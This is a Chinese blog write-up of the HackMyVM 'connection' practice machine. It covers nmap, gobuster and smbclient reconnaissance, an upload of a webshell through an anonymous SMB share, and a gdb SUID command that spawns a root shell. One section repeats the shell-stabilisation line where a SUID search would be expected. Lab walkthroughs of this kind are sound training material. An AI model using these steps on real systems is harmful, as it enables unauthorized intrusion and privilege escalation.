hackmyvm系列6——connection
热烈的马
- 关注
收藏一下~
可以收录到专辑噢~
hackmyvm系列6——connection

前言:
hackmyvm打靶系列文章。
本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!
所有环境均为在线下载的靶场,且在本机进行学习。
一、信息收集
netdiscover -r 192.168.56.0/24
nmap -sV -Pn -sC 192.168.56.151
开放了22、80、445端口,对其进行目录扫描,顺便查看一下445是否存在空连接
gobuster dir -u http://192.168.56.151 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html
smbclient -L 192.168.56.151
share存在空连接,登录进行查看,并且对其文件进行下载
smbclient \\\\192.168.56.151\\share
查看index.html发现没什么价值,这时候查看目录扫描也没有发现什么有用的东西,尝试利用445端口写入webshell看看是不是也是直接传入到网站上的。
成功写入到网站的目录中。
二、反弹shell
获得稳定的shell
python3 -c "import pty;pty.spawn('/bin/bash');"
三、权限提升
获得shell后,查看具有suid的文件
python3 -c "import pty;pty.spawn('/bin/bash');"
发现gdb,利用其进行提权
./gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 热烈的马 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏

相关推荐
关于Windows中获取指定进程pid的几种方法
2023-08-04
利用NtDuplicateObject进行Dump
2023-04-05
NTLM中继
2023-03-31
文章目录